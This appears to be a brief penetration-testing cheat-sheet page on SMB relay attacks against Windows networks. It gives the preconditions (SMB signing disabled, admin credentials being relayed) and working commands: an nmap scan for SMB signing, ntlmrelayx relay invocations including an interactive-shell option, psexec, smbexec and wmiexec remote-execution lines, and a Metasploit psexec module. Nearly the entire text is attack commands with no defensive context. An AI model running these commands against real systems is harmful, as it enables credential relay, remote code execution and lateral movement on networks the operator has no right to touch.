Windows stuff
Smbrelay - relay hash
smb signing must be disabled on target
relayed user creds must be admin on target
python ntlmrelayx.py -tf targets.txt -smb2support
nmap --script=smb2-security-mode.nse -p445 ip/24
interactive: python ntlmrelayx.py -tf targets.txt -smb2support -i
psexec.py domain/username:password@192.168.1.1 smbexec.py .... wmiexec.py ...
msf exploit/windows/smb/psexec_psh
Last updated
Was this helpful?